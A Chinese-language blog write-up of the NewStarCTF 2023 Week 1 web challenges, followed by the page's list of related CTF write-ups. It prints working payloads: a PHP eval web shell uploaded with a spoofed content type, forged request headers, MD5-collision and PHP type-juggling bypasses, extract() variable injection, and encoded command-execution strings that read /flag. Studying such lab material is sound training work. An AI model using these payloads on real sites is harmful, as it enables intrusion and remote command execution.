2023NewStarCtf WEB [WEEK1] 超详细题目思路wp

已于 2023-10-12 21:43:51 修改
阅读量586 收藏 3
点赞数 5
分类专栏: 各种ctf的wp合集 文章标签: 网络安全 web安全
于 2023-10-10 18:38:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76690905/article/details/133751735
版权

1、泄漏的秘密

扫描目录得到www.zip,下载到电脑后打开里面有index.php和robots.txt,点开得到两段flag,拼接得到完整flag

bde4361d6fcc4fb2a54e878b60c6f00d.png

 

2、Begin of Upload

这里上传一句话木马,抓包后修改content-type:image/png绕过检测,这里使用的木马是

php phpinfo(); @eval($_POST['shell']);

ad430173af614ca9ab2f356c242a0afd.png

这里看见php信息说明木马上传成功,用蚁剑链接flag在根目录下

cb181f7c4fa543c7be585d1fdc8e8f2b.png

3、Begin of HTTP

以闯关形式做题,最后抓包修改后的内容如下。

User-Agent:后面表示的是服务器

referer后面改为newstarctf.com,加上X-Forworded-For:127.0.0.1,把所有有网址的地方都改为127.0.0.1

431fe723ede04225a22fb828ca8ee131.png

 

4、ErrorFlask

简单测试了一下就在源码出现了flag

?number1=2&number2=__class__

ddd59a6150694189bdb7a56b6f52282c.png

5、Begin of PHP

题目如下

 <?php
error_reporting(0);
highlight_file(__FILE__);

if(isset($_GET['key1']) && isset($_GET['key2'])){
    echo "=Level 1=<br>";
    if($_GET['key1'] !== $_GET['key2'] && md5($_GET['key1']) == md5($_GET['key2'])){
        $flag1 = True;
    }else{
        die("nope,this is level 1");
    }
}

if($flag1){
    echo "=Level 2=<br>";
    if(isset($_POST['key3'])){
        if(md5($_POST['key3']) === sha1($_POST['key3'])){
            $flag2 = True;
        }
    }else{
        die("nope,this is level 2");
    }
}

if($flag2){
    echo "=Level 3=<br>";
    if(isset($_GET['key4'])){
        if(strcmp($_GET['key4'],file_get_contents("/flag")) == 0){
            $flag3 = True;
        }else{
            die("nope,this is level 3");
        }
    }
}

if($flag3){
    echo "=Level 4=<br>";
    if(isset($_GET['key5'])){
        if(!is_numeric($_GET['key5']) && $_GET['key5'] > 2023){
            $flag4 = True;
        }else{
            die("nope,this is level 4");
        }
    }
}

if($flag4){
    echo "=Level 5=<br>";
    extract($_POST);
    foreach($_POST as $var){
        if(preg_match("/[a-zA-Z0-9]/",$var)){
            die("nope,this is level 5");
        }
    }
    if($flag5){
        echo file_get_contents("/flag");
    }else{
        die("nope,this is level 5");
    }
}

9e378a10c11a4e7185da80ca86747811.png

key1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2

key2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

这是一对MD5值相同但是本身不相同的东西,或者这里用数组绕过也行key1[]=1&key2[]=1

!is_number确保传参的没有数字,这里要求传入的数大于2023但是不能输入数字,我们可以用%00截断绕过或者在2024后面加字母,比如2024%00,2024admin,php的弱比较也能用这种方式绕过

完整payload:

key1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&key2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2&key4[]=1&key5=2024%00

最后个条件困了我挺久,以为是检测整个post请求体都不含字母数字,其实不是,最后两个都是空格,payload:

flag5= &key3[]=

原理如下:

先用extract把post方法传的数据提取成一个个参数,两个传的都是空格,哪怕给flag5传的是空格,服务器也是认为flag5存在的


6、rce

php在接收参数的时候发现表单名有点号(.)或者空格( )的时候会自动把它们转化为下划线,e_v.a.l会变成e_v_a_l被服务器接受,自然无法命令执行。但是php会把表单名里的[自动转化为_

68ea3928933841838cc0f72502d61921.png

这里使用了取反绕过,得到system的编码后把system替换为cat /flag得到另一个编码,最后在这两个括号里分别填上编码,第一个括号填system的,第二个填cat /flag的(~)(~);

<?php
$a=urlencode(~'system');
echo $a;
?>

a6a30319844245be9bdb7d5b58d737d8.png

payload:

(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

 当然也可以使用简单的模糊绕过比如:

e[v.a.l=echo `ta? /fl*`;

7、login

用brupsuite爆破admin的密码得到密码000000

登录后进入一个交互界面,其实在这个时候翻一下历史包搜flag关键词就能找到flag

812bd8b8af83a7da56496fd6524b24e8.png

如有错误欢迎指出

 

 

 

 

 

 

 

 

Usagi!
关注
专栏目录
详细的 Python 方法、函数总结
Amo Xiang的博客
05-17 3万+
目录阅读前必读(不看会错过一个亿)一、字符串操作1.1 capitalize() 方法——字符串首字母转换为大写1.2 casefold() 方法——所有大写字符转换为小写1.3 center() 方法——字符串居中填充1.4 count() 方法——统计字符串出现次数1.5 encode() 方法——编码字符串1.6 decode() 方法——解码字符串1.7 endswith() 方法——是否以指定子字符串结尾、startswith() 方法1.8 find() 方法——字符串首次出现的索引位置(rfi
HGAME 2022 week1 个人部分WP
qazwsxeb的博客
02-10 3842
寒假期间,小萌新在家瞎搞CTF,也是第一次参加HGAME,整体来说题目是简单的,但对于我这个萌新菜鸟来说,还是一头雾水,只会做一些简单的密码题,week1web和misc还能做出几题,后面几周就完全不会了,二进制完全看不懂。。。已经坐牢有一段时间了,想想还是不要浪费时间,记录下这次比赛,也是一种学习。 本人还是个萌新,WP可能会存在很多错误,望各位大佬勿喷,也请多多指正。 web Tetris plus 描述:据说没人能过 3000 分。要是做题做累了,就来玩玩小游戏吧(x 这道题很明显是玩游
[wp]NewStarCTF 2023 WEEK1|WEB
m0_63138919的博客
09-30 3104
本文为NewStarCTF 2023 web 的解题思路过程解法
2023NewStar】#Week1 Web和Crypto 全题解!涉及知识扩展~
jayq1的博客
10-02 1622
本篇文章在web方面属于中规中矩的解法,师傅们看着玩叭,在crypto方面是有一些知识扩展的,包括仿射密码、连分数等~
2024-NewStarCTF-WEEK1
最新发布
2301_80185313的博客
10-10 1295
2024-NewStarCTF-WEEK1 wp
NewStarCTF 2023 Week1 web官方wp
m0_63641882的博客
10-04 766
进入题目首先要求以GET方式传参:http://ec7fe482-428e-4978-8b2c-4016472b07a7.node4.buuoj.cn:81/index.php?ctf=ok接着要求以POST方式传递secret参数,并且secret参数的值是固定的: 右键查看页面源代码可以看到base64编码后的secret值: base64解码得到 使用HackBar发送secret: 添加X-Real-IP头,
[NewStarCTF 2023] web题解
热门推荐
rev1ve的博客
10-16 1万+
分析一下,第一个if语句判断条件为上传的password参数的MD5值前六位为c4d038;和反引号去绕过对system函数的过滤,反斜杠绕过flag,tac替换cat命令。(多次尝试,发现回显的位置在5而不是1,开始卡了很久没回显)简单的文件包含,这里过滤了常见的转换过滤器base和rot。打开题目,发现是小游戏(题目跟最近打的SHCTF比较像)我们丢到重放器,发现是页面302状态,并且出现了提示。(这里用XFF不行,我用的是X-Real-IP)打开题目,提示我们传参两个数,然后帮我们计算。
NewStarCTF 2023 公开赛道部分wp
m0_66458291的博客
10-02 515
参加NewStarCTF 2023 公开赛道将自己做出来的题目进行总结一下,包括web和密码学两个部分的部分题目
xdoj-week1-题解
05-12
压缩包文件名为"XDOJ-week1",很可能包含的是每道题目的题解文档,比如Markdown格式的文本文件或者PDF,这些文档可能会详细阐述解题思路,给出关键的算法步骤,甚至包括优化后的源代码示例。学习者可以通过阅读这些...
hgame-2018 CTFwp(杭电信安)week1
苟有恒,必有三更眠,五更起。
03-04 3111
原题链接 由于开放时间短,不知道什么时候结束。我会将题目的大致内容以图片形式down下来。 web1 Are you from Europe? URL http://123.206.203.108:10001/European.html 一看题,就感觉想是用burp抓包做,来自欧洲,就想到改语言,accept-langue字段。 但是,我试了en,gk等等值,并没有什么卵用。而且发现
华为中国大学生ICT大赛-网络技术赛道-WLAN知识资料
09-22
华为中国大学生ICT大赛-网络技术赛道--WLAN知识资料
NewStarCTF 2023 Week1 MISC-wp
wobushilijiatu的博客
01-12 494
我们得到一个流量包 发现很多http流量 我们过滤一下发现有很多状态码为404的错误 我们在过滤一下发现一串字符串 有点像base编码 解码两次得到flagbase解码 套了3层base编码。
2023NewStarCTF
m0_73550830的博客
10-01 284
2023NewStarCTF——Crypto——Wp DexterJie’Blog
NewStarCTF 2023 公开赛道 Week1网络安全基础视频教程
2401_83974607的博客
04-03 664
if name == ‘__main__’: n = gen_prime(32) e = 65537 m = bytes_to_long(flag) c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag from secret import flag from Crypto.Util.number import *p = getPrime(1024) q = getPrime(1024)d = get
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 686
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
NewStarCTF 2023 公开赛道 Web
m0_73728268的博客
11-05 3854
泄露的秘密,直接看常见的目录robots.txt,www.zip直接那道两段flag也可以用dirsearch工具扫描,但是BUUOJ平台的网站只能开底线程,不然全是429。
BUUCTF NewStarCTF 2023 WEBWP
qq_65165505的博客
10-07 2783
NewStarCTF 2023 公开赛道 web题目wp
NewStarCTF 2023 公开赛道 Week1,数据结构与算法面试题
04-08 854
刚开始以为是摩斯密码,看了B神博客才知道:WhiteSpace,是一种只用空白字符(空格,TAB和回车)编程的语言,而其它可见字符统统为注释。把空白字符复制进去网站,点击run即可。
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两道题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感兴趣,可以尝试参加一些类似的比赛,提高自己的技能和思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值